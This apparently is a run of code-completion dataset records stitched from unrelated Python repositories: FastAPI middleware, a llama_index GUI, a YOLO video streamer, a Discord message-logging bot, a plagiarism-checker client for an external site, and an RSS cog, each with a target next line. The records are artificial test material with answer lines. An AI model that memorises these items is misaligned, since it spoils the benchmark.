"snippet": "async def process_time_log_middleware(request: Request, call_next):\n \"\"\"\n This middleware will log all requests and their processing time.\n E.g. log: HOST:PORT - GET /ping 200 OK 1.00ms\n \"\"\"\n logging.debug(\"middleware: process_time_log_middleware\")\n url = f\"{request.method}: {request.url.path}?{request.query_params}\" if request.query_params else request.url.path\n start_time = time.time()\n response = await call_next(request)\n process_time = (time.time() - start_time) * 1000\n formatted_process_time = \"{0:.2f}\".format(process_time)\n host = getattr(getattr(request, \"client\", None), \"host\", None)\n port = getattr(getattr(request, \"client\", None), \"port\", None)\n response.headers[\"X-Process-Time\"] = formatted_process_time\n try:\n status_phrase = http.HTTPStatus(response.status_code).phrase\n except ValueError:\n status_phrase=\"\"\n logging.info(f'{host}:{port} - \"{request.method} {url}\" {response.status_code} {status_phrase} {formatted_process_time}ms')\n return response"
},
{
"identifier": "RateLimitCoreMiddleware",
"path": "core/middlewares/https/rate_limit.py",
"snippet": "class RateLimitCoreMiddleware(BaseHTTPMiddleware):\n # TODO apply = Redis\n RATE_LIMIT_DURATION = timedelta(seconds=10)\n RATE_LIMIT_REQUESTS = 5\n\n def __init__(self, app):\n super().__init__(app)\n # Dictionary to store request counts for each IP\n self.request_counts = {}\n\n async def dispatch(self, request: Request, call_next):\n # Get the client's IP address\n client_ip = request.client.host\n\n # Check if IP is already present in request_counts\n request_count, last_request = self.request_counts.get(client_ip, (0, datetime.min))\n\n # Calculate the time elapsed since the last request\n elapsed_time = datetime.now() - last_request\n\n if elapsed_time > self.RATE_LIMIT_DURATION:\n request_count = 1\n else:\n if request_count >= self.RATE_LIMIT_REQUESTS:\n return JSONResponse(\n status_code=429,\n content={\"detail\": \"Rate limit exceeded. Please try again later.\"}\n )\n request_count += 1\n\n # Update the request count and last request timestamp for the IP\n self.request_counts[client_ip] = (request_count, datetime.now())\n\n response = await call_next(request)\n return response"
},
{
"identifier": "router",
"path": "src/router.py",
"snippet": "def index():"
},
{
"identifier": "get_settings",
"path": "src/setting.py",
"snippet": "@lru_cache()\ndef get_settings() -> CoreSettings:\n if getenv(\"_ENV\", None) is None:\n raise Exception(\"Cannot get _ENV environment\")\n return CustomSettings()"
}
] | import logging
from os import getenv
from core.middlewares.https.process_time import process_time_log_middleware
from core.middlewares.https.rate_limit import RateLimitCoreMiddleware
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from fastapi.middleware.trustedhost import TrustedHostMiddleware
from src.router import router as api_router
from src.setting import get_settings | 881 |
logger = logging.getLogger(__name__)
def create_app():
settings = get_settings()
app = FastAPI(
title=f"{settings.PROJECT_NAME}",
version=settings.APP_VERSION,
debug=settings.DEBUG,
description=f"""
FastAPI Framework + K8s \n
- PROJECT NAME: {settings.PROJECT_NAME} \n
- VERSION: {settings.APP_VERSION} \n
- ENV: {settings._ENV} \n
- DEBUG: {settings.DEBUG} \n
- API URI: {settings.API_VERSION_PREFIX} \n
""",
)
|
logger = logging.getLogger(__name__)
def create_app():
settings = get_settings()
app = FastAPI(
title=f"{settings.PROJECT_NAME}",
version=settings.APP_VERSION,
debug=settings.DEBUG,
description=f"""
FastAPI Framework + K8s \n
- PROJECT NAME: {settings.PROJECT_NAME} \n
- VERSION: {settings.APP_VERSION} \n
- ENV: {settings._ENV} \n
- DEBUG: {settings.DEBUG} \n
- API URI: {settings.API_VERSION_PREFIX} \n
""",
) | app.include_router(api_router, prefix=settings.API_VERSION_PREFIX) | 1 | 2023-12-20 03:40:34+00:00 | 2k |
CoolPointerException/Amigo | gui/llama_index_init.py | [
{
"identifier": "validate",
"path": "gui/input_validator.py",
"snippet": "def validate(gui, properties):\n for prop in properties:\n match prop:\n case Properties.PROJECT_NAME:\n project_name = gui.projects_tab.project_name_entry.get()\n if not project_name:\n messagebox.showerror(\"Error\", \"Please enter a project name.\")\n return False\n\n if project_name in forbidden_names:\n messagebox.showerror(\"Error\", \"Please enter a valid project name. \\nForbidden names:\\n - \" + \"\\n - \"\n .join(forbidden_names))\n return False\n case Properties.SELECTED_DIRECTORY:\n selected_directory = gui.projects_tab.selected_directory\n if not selected_directory:\n messagebox.showerror(\"Error\", \"Please select a directory.\")\n return False\n case Properties.API_TYPE:\n api_type = gui.settings_tab.api_type.get()\n if not api_type:\n messagebox.showerror(\"Error\", \"Please select API type in Settings Tab.\")\n return False\n case Properties.API_BASE:\n api_base = gui.settings_tab.api_host_entry.get()\n if not api_base:\n messagebox.showerror(\"Error\", \"Please enter API base in Settings Tab.\")\n return False\n case Properties.API_VERSION:\n api_version = gui.settings_tab.api_version_entry.get()\n if not api_version:\n messagebox.showerror(\"Error\", \"Please enter API version in Settings Tab.\")\n return False\n case Properties.API_KEY:\n api_key = gui.settings_tab.api_key_entry.get()\n if not api_key:\n messagebox.showerror(\"Error\", \"Please enter API key in Settings Tab.\")\n return False\n case Properties.GPT_MODEL:\n gpt_model = gui.settings_tab.gpt_model.get()\n if not gpt_model:\n messagebox.showerror(\"Error\", \"Please enter GPT model name in Settings Tab.\")\n return False\n case Properties.GPT_DEPLOYMENT:\n gpt_deployment = gui.settings_tab.gpt_deployment.get()\n if not gpt_deployment:\n messagebox.showerror(\"Error\", \"Please enter GPT deployment name in Settings Tab.\")\n return False\n case Properties.EMBEDDING_MODEL:\n embedding_model = gui.settings_tab.embeddings_model_entry.get()\n if not embedding_model:\n messagebox.showerror(\"Error\", \"Please enter embedding model name in Settings Tab.\")\n return False\n case Properties.EMBEDDING_DEPLOYMENT:\n embedding_deployment = gui.settings_tab.embeddings_deployment_entry.get()\n if not embedding_deployment:\n messagebox.showerror(\"Error\", \"Please enter embedding deployment name in Settings Tab.\")\n return False\n case Properties.PROMPT:\n prompt = gui.settings_tab.prompt_entry.get(\"1.0\", tk.END)\n if not prompt:\n messagebox.showerror(\"Error\", \"Please enter a prompt in Settings Tab.\")\n return False\n case Properties.MAX_TOKENS:\n max_tokens = gui.settings_tab.max_tokens.get()\n if not max_tokens:\n messagebox.showerror(\"Error\", \"Please enter max tokens in Settings Tab.\")\n return False\n case Properties.TASK_REQUIREMENTS:\n task_requirements = gui.task_tab.task_requirements_entry.get(\"1.0\", tk.END)\n if not task_requirements:\n messagebox.showerror(\"Error\", \"Please enter a Task requirements.\")\n return False\n case Properties.SELECTED_PROJECT:\n selected_project = gui.task_tab.selected_project.get()\n if not selected_project:\n messagebox.showerror(\"Error\", \"Please select a project.\")\n return False\n case Properties.THREADS:\n threads = gui.settings_tab.threads.get()\n if not threads:\n messagebox.showerror(\"Error\", \"Please enter number of threads in Settings Tab.\")\n return False\n case Properties.REINDEX_PROJECT:\n reindex_project = gui.projects_tab.reindex_project.get()\n if not reindex_project:\n messagebox.showerror(\"Error\", \"Please select a project to reindex.\")\n return False\n return True"
},
{
"identifier": "Properties",
"path": "gui/input_validator.py",
"snippet": "class Properties(Enum):\n PROJECT_NAME = 1\n SELECTED_DIRECTORY = 2\n API_TYPE = 3\n API_BASE = 4\n API_VERSION = 5\n API_KEY = 6\n GPT_MODEL = 7\n GPT_DEPLOYMENT = 8\n EMBEDDING_MODEL = 9\n EMBEDDING_DEPLOYMENT = 10\n PROMPT = 11\n MAX_TOKENS = 12\n TASK_REQUIREMENTS = 13\n SELECTED_PROJECT = 14\n THREADS = 15\n REINDEX_PROJECT = 16"
}
] | from tkinter import messagebox
from llama_index import ServiceContext, set_global_service_context, OpenAIEmbedding
from llama_index.embeddings import AzureOpenAIEmbedding, GeminiEmbedding
from llama_index.llms import Gemini, OpenAI, AzureOpenAI
from gui.input_validator import validate, Properties | 1,186 |
def init_llama_index(self, api_type):
if self.isLlamaInitialized:
return
llm = None
embed_model = None
if api_type == "azure":
is_valid = validate(self, [
|
def init_llama_index(self, api_type):
if self.isLlamaInitialized:
return
llm = None
embed_model = None
if api_type == "azure":
is_valid = validate(self, [ | Properties.API_BASE, | 1 | 2023-12-15 14:06:38+00:00 | 2k |
redvulpecula/DRILL-Concurrent-Python-1 | main.py | [
{
"identifier": "VideoStream",
"path": "video_streaming.py",
"snippet": "class VideoStream:\n def __init__(self, url, frames):\n self.frames = frames\n self.url = url\n self.process = Process(target=self.capture, args=(self.frames, self.url))\n self.process.start()\n\n def capture(self, frames, url):\n cap = cv2.VideoCapture(url)\n error_reported = False\n last_success_time = time.time()\n video_count = 0 \n initial_connection_made = False \n\n while True:\n ret, frame = cap.read()\n if not ret:\n if time.time() - last_success_time > 60:\n print(\"Cannot connect to stream for more than 1 minute. Exiting.\")\n break\n if not error_reported:\n if initial_connection_made: \n video_count += 1 \n print(f\"Finished streaming video number {video_count}.\")\n print(\"Attempting to reconnect to the next video...\")\n error_reported = True\n last_success_time = time.time() \n cap.release()\n cap = cv2.VideoCapture(url)\n continue\n \n if not initial_connection_made:\n initial_connection_made = True \n\n error_reported = False\n if not frames.full():\n frames.put(frame)\n\n\n def get_frame(self):\n if not self.frames.empty():\n return self.frames.get()\n\n def release(self):\n self.process.terminate()\n self.process.join()"
},
{
"identifier": "calculate_fps",
"path": "video_streaming.py",
"snippet": "def calculate_fps(prev_time, fps):\n while True:\n curr_time = time.time()\n time_diff = curr_time - prev_time\n if time_diff != 0: # Avoid divide by 0 error\n fps.value = 1 / time_diff\n prev_time = curr_time"
},
{
"identifier": "display_and_save_frame",
"path": "video_streaming.py",
"snippet": "def display_and_save_frame(fps_async, fps_stream, frames):\n prev_time = time.time()\n while True:\n frame = frames.get()\n if frame is None:\n break\n curr_time = time.time()\n time_diff = curr_time - prev_time\n if time_diff != 0:\n fps_stream.value = 1 / time_diff\n prev_time = curr_time\n display_fps(frame, fps_async, fps_stream)\n cv2.imshow('RTSP Stream', frame)\n if cv2.getWindowProperty('RTSP Stream', cv2.WND_PROP_VISIBLE) < 1:\n break\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break"
},
{
"identifier": "check_rtsp_url",
"path": "video_streaming.py",
"snippet": "def check_rtsp_url(url):\n parsed_url = urlparse(url)\n host = parsed_url.hostname\n port = parsed_url.port if parsed_url.port else 554 \n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n sock.connect((host, port))\n sock.close()\n return True\n except socket.error:\n return False"
},
{
"identifier": "read_url_from_file",
"path": "video_streaming.py",
"snippet": "def read_url_from_file(file_path='source.txt'):\n with open(file_path, 'r') as file:\n return file.readline().strip()"
},
{
"identifier": "YOLOProcessor",
"path": "imgAlgSelect.py",
"snippet": "class YOLOProcessor:\n def __init__(self, frames, yolo_model, device, verbose=False):\n self.frames = frames\n self.yolo_model = yolo_model\n self.device = device\n self.verbose = verbose\n\n def process(self):\n while True:\n frame = self.frames.get()\n \n if frame is None:\n break\n\n results = self.yolo_model(frame, device=self.device, verbose=self.verbose)\n result = results[0]\n bboxes = np.array(result.boxes.xyxy.cpu(), dtype=\"int\")\n classes = np.array(result.boxes.cls.cpu(), dtype=\"int\")\n\n for cls, bbox in zip(classes, bboxes):\n (x, y, x2, y2) = bbox\n cv2.rectangle(frame, (x, y), (x2, y2), (0, 0, 225), 2)\n cv2.putText(frame, str(cls), (x, y - 5), cv2.FONT_HERSHEY_PLAIN, 2, (0, 0, 225), 2)\n cv2.imshow('YOLO Model', frame)\n if cv2.getWindowProperty('YOLO Model', cv2.WND_PROP_VISIBLE) < 1:\n break\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break"
}
] | import time
import torch
from multiprocessing import Process, Manager
from ultralytics import YOLO
from video_streaming import VideoStream, calculate_fps, display_and_save_frame, check_rtsp_url, read_url_from_file
from imgAlgSelect import YOLOProcessor | 1,420 |
class ConcurrencyManager:
def __init__(self, url):
self.device = 'cuda' if torch.backends.cuda.is_built() else 'mps' if torch.backends.mps.is_available() else 'cpu'
self.yolo_model = YOLO("yolov8m.pt")
self.manager = Manager()
self.url = url
self.frames = self.manager.Queue(maxsize=1)
self.video_stream = VideoStream(url, self.frames)
self.fps_async = self.manager.Value('d', 0.0)
self.fps_stream = self.manager.Value('d', 0.0)
def start_stream(self):
print("Waiting for the stream.")
while not check_rtsp_url(self.url):
print("Cannot connect to the URL or the port is not open. Retrying.")
p_fps = Process(target=calculate_fps, args=(time.time(), self.fps_async))
p_fps.start()
p_display = Process(target=display_and_save_frame, args=(self.fps_async, self.fps_stream, self.video_stream.frames))
p_display.start()
p_yolo = Process(target=YOLOProcessor(self.video_stream.frames, self.yolo_model, self.device).process)
p_yolo.start()
p_display.join()
p_fps.join()
p_yolo.join()
self.video_stream.release()
def main():
|
class ConcurrencyManager:
def __init__(self, url):
self.device = 'cuda' if torch.backends.cuda.is_built() else 'mps' if torch.backends.mps.is_available() else 'cpu'
self.yolo_model = YOLO("yolov8m.pt")
self.manager = Manager()
self.url = url
self.frames = self.manager.Queue(maxsize=1)
self.video_stream = VideoStream(url, self.frames)
self.fps_async = self.manager.Value('d', 0.0)
self.fps_stream = self.manager.Value('d', 0.0)
def start_stream(self):
print("Waiting for the stream.")
while not check_rtsp_url(self.url):
print("Cannot connect to the URL or the port is not open. Retrying.")
p_fps = Process(target=calculate_fps, args=(time.time(), self.fps_async))
p_fps.start()
p_display = Process(target=display_and_save_frame, args=(self.fps_async, self.fps_stream, self.video_stream.frames))
p_display.start()
p_yolo = Process(target=YOLOProcessor(self.video_stream.frames, self.yolo_model, self.device).process)
p_yolo.start()
p_display.join()
p_fps.join()
p_yolo.join()
self.video_stream.release()
def main(): | url = read_url_from_file() | 4 | 2023-12-18 02:58:03+00:00 | 2k |
LyubomirT/discord-lle | main.py | [
{
"identifier": "Colorizer",
"path": "colorizer.py",
"snippet": "class Colorizer:\n def __init__(self, color):\n self.color = color\n self.colors = {\n \"red\": \"\\033[31m\",\n \"green\": \"\\033[32m\",\n \"yellow\": \"\\033[33m\",\n \"blue\": \"\\033[34m\",\n \"magenta\": \"\\033[35m\",\n \"cyan\": \"\\033[36m\",\n \"white\": \"\\033[37m\",\n \"orange\": \"\\033[38;5;208m\",\n \"purple\": \"\\033[38;5;135m\",\n \"pink\": \"\\033[38;5;219m\",\n \"grey\": \"\\033[38;5;246m\",\n \"reset\": \"\\033[0m\"\n }\n if self.color not in self.colors:\n raise Exception(\"Color not found\")\n \n def colorize(self, text):\n return self.colors[self.color] + text + self.colors[\"reset\"]"
},
{
"identifier": "verify_dir",
"path": "verify_dir.py",
"snippet": "def verify_dir(log_dir):\n # Fully verify the directory structure\n # If it doesn't exist, create it\n # If it does exist, make sure it is empty or follows the correct format\n\n # Check if the log directory exists\n if not os.path.exists(log_dir):\n os.mkdir(log_dir)\n print(Colorizer(\"cyan\").colorize(\"Log directory created.\"))\n else:\n print(Colorizer(\"cyan\").colorize(\"Log directory already exists. In use.\"))\n \n # Check if the DM directory exists\n if not os.path.exists(log_dir + \"/DMs\"):\n os.mkdir(log_dir + \"/DMs\")\n \n # Check if the server directory exists\n if not os.path.exists(log_dir + \"/Servers\"):\n os.mkdir(log_dir + \"/Servers\")\n\n # Check if the DM directory is empty\n if not os.listdir(log_dir + \"/DMs\"):\n print(Colorizer(\"cyan\").colorize(\"DM directory is empty.\"))\n else:\n print(Colorizer(\"cyan\").colorize(\"DM directory contains log files / other files.\"))\n \n # Check if the server directory is empty\n if not os.listdir(log_dir + \"/Servers\"):\n print(Colorizer(\"cyan\").colorize(\"Server directory is empty.\"))\n else:\n print(Colorizer(\"cyan\").colorize(\"Server directory contains log files / other files.\"))"
}
] | from dotenv import load_dotenv
from discord.ext import commands
from discord.commands import Option
from discord.ui import Button, View, Select, Modal
from colorizer import Colorizer
from datetime import datetime
from verify_dir import verify_dir
import os
import requests
import json
import discord
import configparser
import asyncio | 1,460 |
load_dotenv()
token = os.getenv("BOT_TOKEN")
bot = commands.Bot(command_prefix="!", intents=discord.Intents.all())
log_dir = "_logs_"
dm_config = {
"enabled": True,
"download_images": True,
"download_videos": True,
"download_audio": True,
}
server_config = {
"enabled": True,
"download_images": True,
"download_videos": True,
"download_audio": True,
}
printContents = False
logtodms = False
ownerid = 0
def load_config():
with open("_config_/directories.cfg", "r") as f:
try:
config = configparser.ConfigParser()
config.read_file(f)
except:
print(Colorizer("red").colorize("Could not load config! The directories.cfg file is missing or corrupt."))
os._exit(1)
global log_dir
try:
log_dir = config["directories"]["log_dir"]
except:
print(Colorizer("red").colorize("Could not load config! Please specify a proper log directory or use cfg_gen.py to generate a new config file."))
os._exit(1)
with open("_config_/types.cfg", "r") as f:
try:
config = configparser.ConfigParser()
config.read_file(f)
except:
print(Colorizer("red").colorize("Could not load config! The types.cfg file is missing or corrupt."))
os._exit(1)
global dm_config
try:
dm_config["enabled"] = bool(config["direct_messages"]["enabled"])
dm_config["download_images"] = bool(config["direct_messages"]["download_images"])
dm_config["download_videos"] = bool(config["direct_messages"]["download_videos"])
dm_config["download_audio"] = bool(config["direct_messages"]["download_audio"])
except:
print(Colorizer("red").colorize("Could not load config! Please specify proper types (DM) or use cfg_gen.py to generate a new config file."))
os._exit(1)
global server_config
try:
server_config["enabled"] = bool(config["servers"]["enabled"])
server_config["download_images"] = bool(config["servers"]["download_images"])
server_config["download_videos"] = bool(config["servers"]["download_videos"])
server_config["download_audio"] = bool(config["servers"]["download_audio"])
except:
print(Colorizer("red").colorize("Could not load config! Please specify proper types (server) or use cfg_gen.py to generate a new config file."))
os._exit(1)
with open("_config_/misc.cfg", "r") as f:
try:
config = configparser.ConfigParser()
config.read_file(f)
except:
print(Colorizer("red").colorize("Could not load config! The misc.cfg file is missing or corrupt."))
os._exit(1)
global printContents
try:
printContents = bool(config["Console"]["printContents"])
except:
print(Colorizer("red").colorize("Could not load config! Please specify proper misc options (printContents) or use cfg_gen.py to generate a new config file."))
os._exit(1)
global logtodms
try:
logtodms = bool(config["DiscordLog"]["enabled"])
except:
print(Colorizer("red").colorize("Could not load config! Please specify proper misc options (logtodms) or use cfg_gen.py to generate a new config file."))
os._exit(1)
global ownerid
try:
ownerid = int(config["DiscordLog"]["ownerid"])
except:
print(Colorizer("red").colorize("Could not load config! Please specify proper misc options (ownerid) or use cfg_gen.py to generate a new config file."))
os._exit(1)
|
load_dotenv()
token = os.getenv("BOT_TOKEN")
bot = commands.Bot(command_prefix="!", intents=discord.Intents.all())
log_dir = "_logs_"
dm_config = {
"enabled": True,
"download_images": True,
"download_videos": True,
"download_audio": True,
}
server_config = {
"enabled": True,
"download_images": True,
"download_videos": True,
"download_audio": True,
}
printContents = False
logtodms = False
ownerid = 0
def load_config():
with open("_config_/directories.cfg", "r") as f:
try:
config = configparser.ConfigParser()
config.read_file(f)
except:
print(Colorizer("red").colorize("Could not load config! The directories.cfg file is missing or corrupt."))
os._exit(1)
global log_dir
try:
log_dir = config["directories"]["log_dir"]
except:
print(Colorizer("red").colorize("Could not load config! Please specify a proper log directory or use cfg_gen.py to generate a new config file."))
os._exit(1)
with open("_config_/types.cfg", "r") as f:
try:
config = configparser.ConfigParser()
config.read_file(f)
except:
print(Colorizer("red").colorize("Could not load config! The types.cfg file is missing or corrupt."))
os._exit(1)
global dm_config
try:
dm_config["enabled"] = bool(config["direct_messages"]["enabled"])
dm_config["download_images"] = bool(config["direct_messages"]["download_images"])
dm_config["download_videos"] = bool(config["direct_messages"]["download_videos"])
dm_config["download_audio"] = bool(config["direct_messages"]["download_audio"])
except:
print(Colorizer("red").colorize("Could not load config! Please specify proper types (DM) or use cfg_gen.py to generate a new config file."))
os._exit(1)
global server_config
try:
server_config["enabled"] = bool(config["servers"]["enabled"])
server_config["download_images"] = bool(config["servers"]["download_images"])
server_config["download_videos"] = bool(config["servers"]["download_videos"])
server_config["download_audio"] = bool(config["servers"]["download_audio"])
except:
print(Colorizer("red").colorize("Could not load config! Please specify proper types (server) or use cfg_gen.py to generate a new config file."))
os._exit(1)
with open("_config_/misc.cfg", "r") as f:
try:
config = configparser.ConfigParser()
config.read_file(f)
except:
print(Colorizer("red").colorize("Could not load config! The misc.cfg file is missing or corrupt."))
os._exit(1)
global printContents
try:
printContents = bool(config["Console"]["printContents"])
except:
print(Colorizer("red").colorize("Could not load config! Please specify proper misc options (printContents) or use cfg_gen.py to generate a new config file."))
os._exit(1)
global logtodms
try:
logtodms = bool(config["DiscordLog"]["enabled"])
except:
print(Colorizer("red").colorize("Could not load config! Please specify proper misc options (logtodms) or use cfg_gen.py to generate a new config file."))
os._exit(1)
global ownerid
try:
ownerid = int(config["DiscordLog"]["ownerid"])
except:
print(Colorizer("red").colorize("Could not load config! Please specify proper misc options (ownerid) or use cfg_gen.py to generate a new config file."))
os._exit(1)
| verify_dir(log_dir) | 1 | 2023-12-18 16:08:05+00:00 | 2k |
KR1470R/plagiator-py | utils/plagiator.py | [
{
"identifier": "exists",
"path": "utils/exists.py",
"snippet": "def exists(obj, *keys):\n format_keys = \"\".join(\n list(map(\n lambda key: f\"['{key}']\",\n keys\n ))\n )\n try:\n return eval(f\"obj{format_keys}\")\n except Exception:\n return None"
},
{
"identifier": "API_URI",
"path": "configs/edupirdie.py",
"snippet": "API_URI = \"https://edubirdie.com/plagiarism-checker-send-data\""
},
{
"identifier": "HEADERS",
"path": "configs/edupirdie.py",
"snippet": "HEADERS = {\n \"Host\": \"edubirdie.com\",\n \"Accept\": \"*/*\",\n \"Accept-Language\": \"en-US,en;q=0.5\",\n \"Accept-Encoding\": \"gzip\",\n \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\",\n \"Referer\": \"https://edubirdie.com/perevirka-na-plagiat\",\n \"X-Requested-With\": \"XMLHttpRequest\",\n \"Origin\": \"https://edubirdie.com\",\n \"DNT\": \"1\",\n \"Sec-Fetch-Dest\": \"empty\",\n \"Sec-Fetch-Mode\": \"cors\",\n \"Sec-Fetch-Site\": \"same-origin\",\n \"Connection\": \"keep-alive\",\n \"Pragma\": \"no-cache\",\n \"Cache-Control\": \"no-cache\",\n}"
}
] | import json
import logging
import requests
from .exists import exists
from configs.edupirdie import API_URI, HEADERS
from random_user_agent.user_agent import UserAgent
from random_user_agent.params import SoftwareName, OperatingSystem | 844 |
class Plagiator:
def __init__(self):
self.session = requests.Session()
adapter = requests.adapters.HTTPAdapter(pool_connections=10000, pool_maxsize=10000)
self.session.mount("https://", adapter)
software_names = [software_name.value for software_name in SoftwareName]
operating_systems = [operating_system.value for operating_system in OperatingSystem]
self.user_agent_rotator = UserAgent(
software_names=software_names,
operating_systems=operating_systems,
limit=1000
)
def concretize_response(self, response: dict):
if exists(response, "error") and response["error"]:
return response
del response["error"]
del response["error_code"]
if len(response["title"]) == 0:
del response["title"]
words = response["text"].split(" ")
if exists(response, "highlight") and len(response["highlight"]):
highlight_text = []
for span in response["highlight"]:
span = list(map(int, span))
selected_words = words[span[0]] if (
span[0] == span[1]
) else words[span[0]:span[1]]
if isinstance(selected_words, list):
selected_words = " ".join(selected_words)
highlight_text.append(selected_words)
response["highlight"] = highlight_text
if exists(response, "matches") and len(response["matches"]):
matches_highlight = []
for match in response["matches"]:
matched_highlight_text = []
for match_span in match["highlight"]:
match_span = list(map(int, match_span))
selected_words = words[match_span[0]] if (
match_span[0] == match_span[1]
) else words[match_span[0]:match_span[1]]
if isinstance(selected_words, list):
selected_words = " ".join(selected_words)
matched_highlight_text.append(selected_words)
matches_highlight.append({**match, "highlight": matched_highlight_text})
response["matches"] = matches_highlight
return response
def __request__(self, text: str, title: str = None):
return self.session.post(
API_URI,
headers={
|
class Plagiator:
def __init__(self):
self.session = requests.Session()
adapter = requests.adapters.HTTPAdapter(pool_connections=10000, pool_maxsize=10000)
self.session.mount("https://", adapter)
software_names = [software_name.value for software_name in SoftwareName]
operating_systems = [operating_system.value for operating_system in OperatingSystem]
self.user_agent_rotator = UserAgent(
software_names=software_names,
operating_systems=operating_systems,
limit=1000
)
def concretize_response(self, response: dict):
if exists(response, "error") and response["error"]:
return response
del response["error"]
del response["error_code"]
if len(response["title"]) == 0:
del response["title"]
words = response["text"].split(" ")
if exists(response, "highlight") and len(response["highlight"]):
highlight_text = []
for span in response["highlight"]:
span = list(map(int, span))
selected_words = words[span[0]] if (
span[0] == span[1]
) else words[span[0]:span[1]]
if isinstance(selected_words, list):
selected_words = " ".join(selected_words)
highlight_text.append(selected_words)
response["highlight"] = highlight_text
if exists(response, "matches") and len(response["matches"]):
matches_highlight = []
for match in response["matches"]:
matched_highlight_text = []
for match_span in match["highlight"]:
match_span = list(map(int, match_span))
selected_words = words[match_span[0]] if (
match_span[0] == match_span[1]
) else words[match_span[0]:match_span[1]]
if isinstance(selected_words, list):
selected_words = " ".join(selected_words)
matched_highlight_text.append(selected_words)
matches_highlight.append({**match, "highlight": matched_highlight_text})
response["matches"] = matches_highlight
return response
def __request__(self, text: str, title: str = None):
return self.session.post(
API_URI,
headers={ | **HEADERS, | 2 | 2023-12-21 17:29:18+00:00 | 2k |
fmhy/bot | cogs/rss.py | [
{
"identifier": "rss_chan_ids",
"path": "cogs/_config.py",
"snippet": "TOKEN = os.getenv(\"TOKEN\", None)\nGUILD_ID = os.getenv(\"GUILD_ID\", None)\nOWNERS = os.getenv(\"OWNERS\").split(\",\")\nRSS_CHANNELS = os.getenv(\"RSS_CHANNEL_IDS\", None)\nFEEDS = os.getenv(\"RSS_FEED_URLS\", None)\nDB = os.getenv(\"db_uri\")\n OWNERS: list[str]\n FEEDS: str\n RSS_CHANNELS: str\n TOKEN: str"
},
{
"identifier": "fetch_feed",
"path": "cogs/_helpers.py",
"snippet": "def fetch_feed():\n # Load the seen IDs from the file, or create an empty dictionary\n sent_articles = list(mycol.find().sort(\"_id\", -1))\n\n for rss_feed_url in rss_feed_urls:\n # Parse the RSS feed\n feed = feedparser.parse(rss_feed_url)\n\n # Check if the feed was parsed successfully\n if feed.bozo:\n print(f\"Error parsing RSS feed: {feed.bozo_exception}\")\n print(f\"{rss_feed_url}\")\n continue\n\n last_entry = feed.entries[0]\n\n x = list(mycol.find({\"link\": last_entry.link}))\n # print(x)\n\n if len(x) == 0:\n article_title = last_entry.title\n article_link = last_entry.link\n mycol.insert_one({\"link\": last_entry.link})\n\n # print(f\"New article: {article_title}\")\n # print(f\"Link: {article_link}\")\n\n yield f\"{EMOJI} | {article_title}\\n\\n{article_link}\"\n\n # print(f\"Parsing complete for {rss_feed_url}\")"
},
{
"identifier": "Bot",
"path": "main.py",
"snippet": "class Bot(commands.Bot):\n def __init__(self) -> None:\n self.start_time = datetime.datetime.now(datetime.UTC)\n intents = discord.Intents.all()\n\n super().__init__(\n command_prefix=commands.when_mentioned_or(prefix),\n intents=intents,\n help_command=help.HelpMenu(),\n case_insensitive=True,\n )\n\n self.session: aiohttp.ClientSession\n formatter.install(\"discord\", \"INFO\")\n formatter.install(\"bot\", \"INFO\")\n self.logger = logging.getLogger(\"discord\")\n self.logger = logging.getLogger(\"bot\")\n\n async def setup_hook(self):\n await self.load_extension(\"jishaku\")\n await self.load_cogs()\n\n async def load_cogs(self):\n s = time.perf_counter()\n for file in os.listdir(\"cogs/\"):\n if file.endswith(\".py\") and not file.startswith(\"_\"):\n extension = f\"cogs.{file[:-3]}\"\n try:\n await self.load_extension(extension)\n self.logger.info(f\"Loaded - {extension}\")\n except Exception as e:\n exception = f\"{type(e).__name__}: {e}\"\n self.logger.exception(\n f\"Failed to load extension {extension}. - {exception}\")\n traceback.print_exc()\n\n elapsed = time.perf_counter() - s\n self.logger.info(f\"Loaded all extensions - took {elapsed:.2f}s\")\n\n async def is_owner(self, user: discord.abc.User):\n if user.id in OWNERS:\n return True\n # Else fall back to the original\n return await super().is_owner(user)\n\n async def on_ready(self) -> None:\n self.session = aiohttp.ClientSession(loop=self.loop)\n await self.change_presence(activity=discord.Game(name=\"Free Media Heck Yeah\"))\n self.logger.info(\"Bot is ready!\")"
}
] | from typing import TYPE_CHECKING
from discord.ext import commands, tasks
from cogs._config import rss_chan_ids
from cogs._helpers import fetch_feed
from main import Bot
from discord.channel import TextChannel | 985 |
if TYPE_CHECKING:
class RSSFeeds(commands.Cog):
"""RSSFeeds commands"""
def __init__(self, bot: Bot):
self.bot = bot
@commands.Cog.listener()
async def on_ready(self):
self.send_rss.start()
async def cog_before_invoke(self, ctx):
"""Triggers typing indicator on Discord before every command."""
await ctx.channel.typing()
return
@tasks.loop(seconds=300)
async def send_rss(self):
|
if TYPE_CHECKING:
class RSSFeeds(commands.Cog):
"""RSSFeeds commands"""
def __init__(self, bot: Bot):
self.bot = bot
@commands.Cog.listener()
async def on_ready(self):
self.send_rss.start()
async def cog_before_invoke(self, ctx):
"""Triggers typing indicator on Discord before every command."""
await ctx.channel.typing()
return
@tasks.loop(seconds=300)
async def send_rss(self): | for msg in fetch_feed(): | 1 | 2023-12-19 10:27:04+00:00 | 2k |
cvlab-yonsei/RankMixup | calibrate/evaluation/segment_evaluator.py | [
{
"identifier": "DatasetEvaluator",
"path": "calibrate/evaluation/evaluator.py",
"snippet": "class DatasetEvaluator(metaclass=ABCMeta):\n \"\"\"\n Base class for a dataset evaluator\n \"\"\"\n @abstractmethod\n def reset(self):\n \"\"\"\n Preparation for a new round of evaluation.\n Should be called before starting a round of evaluation.\n \"\"\"\n pass\n\n @abstractmethod\n def update(self):\n \"\"\"\n Update status given a mini-batch results\n \"\"\"\n pass\n\n def curr_score(self):\n \"\"\"\n Return curr score after last batch\n \"\"\"\n pass\n\n @abstractmethod\n def mean_score(self):\n \"\"\"\n Return mean score across all classes/samples\n \"\"\"\n pass\n\n def class_score(self):\n \"\"\"\n Return score for different classes\n \"\"\"\n pass\n\n @abstractmethod\n def num_samples(self):\n \"\"\"\n return the evaluated samples\n \"\"\"\n pass\n\n @abstractmethod\n def main_metric(self):\n \"return the name of the main metric\"\n pass"
},
{
"identifier": "EPS",
"path": "calibrate/utils/constants.py",
"snippet": "EPS: float = 1e-10"
}
] | import logging
import numpy as np
import pandas as pd
import wandb
from terminaltables import AsciiTable
from typing import List, Optional
